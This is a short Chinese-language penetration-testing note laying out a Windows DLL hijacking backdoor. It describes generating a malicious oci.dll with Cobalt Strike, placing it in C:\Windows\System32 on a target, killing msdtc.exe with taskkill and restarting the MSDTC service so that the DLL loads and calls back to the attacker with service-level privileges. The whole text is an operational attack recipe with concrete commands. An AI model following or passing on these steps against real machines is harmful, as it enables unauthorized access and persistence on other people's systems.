方式

1.使用cs生成一个名为oci.dll的后门,传到目标机c:\windows\system32目录下面
2.cs上执行taskkill /f /im msdtc.exe 关闭msdtc服务
3.启动服务net start msdtc,即可看到弹回来一个目标,不过权限是服务权限
图片.png